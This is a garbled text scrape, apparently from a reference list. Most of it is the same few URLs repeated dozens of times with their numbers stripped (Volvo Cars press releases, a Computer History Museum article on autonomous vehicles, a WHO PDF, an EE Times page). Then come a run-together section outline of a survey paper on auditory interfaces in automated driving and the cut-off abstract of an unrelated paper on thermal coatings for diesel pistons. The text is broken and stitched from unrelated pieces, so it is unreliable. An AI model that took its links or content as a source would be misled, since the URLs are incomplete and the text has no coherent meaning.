/volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/global/en-gb/media/pressreleases/ /volvo-cars-reveals-world-class-safety-and-support-features-to-be-introduced-in-the-all-new-xc -in- https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ https://www.media.volvocars.com/uk/en-gb/media/pressreleases/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.computerhistory.org/atchm/where-to-a-history-of-autonomous-vehicles/ http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.who.int/iris/bitstream/ / / / _eng.pdf?ua= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://www.eetimes.com/author.asp?section_id= &doc_id= http://dx.doi.org/ . /peerj-cs. auditory interfaces in automated driving: an international survey introduction the development of automated driving systems auditory displays auditory systems in current vehicles: parking assistant and forward collision warning system `augmented/spatial' sound system for fully automated driving the aim of the present survey study methods survey configuration of crowdflower analyses ethics statement results number of respondents and respondent satisfaction data filtering analyses at the individual level cross-national differences in opinion for feedback for takeover requests analyses of textual comments discussion acknowledgements references mechanical and thermal stresses anylsis in diesel engine poiston with and without different thermal coating layer on piston head nabeel abdulhadi ghyadh, maher a.r. sadiq al-baghdadi and sahib shihab ahmed department of mechanical engineering, faculty of engineering, university of kufa, ministry of higher education and scientific research, iraq email:sahib.aldulaimi@uokufa.edu.iq, nabeel.ghayadh@uokufa. edu.iq, mahirar.albaghdadi@uokufa.edu.iq abstract. the main goal of this paper are equate behavior of the piston with and without different thermal coating layer on the piston head under thermal and mechanical loads that arise in the piston due to its operating. three dimensional model of a piston heavy diesel engine has been presented. the governing equations have been discretized using a finite-volume method (fvm) and solved using multi- physics comsol package version . the results of the numerical model are showing the 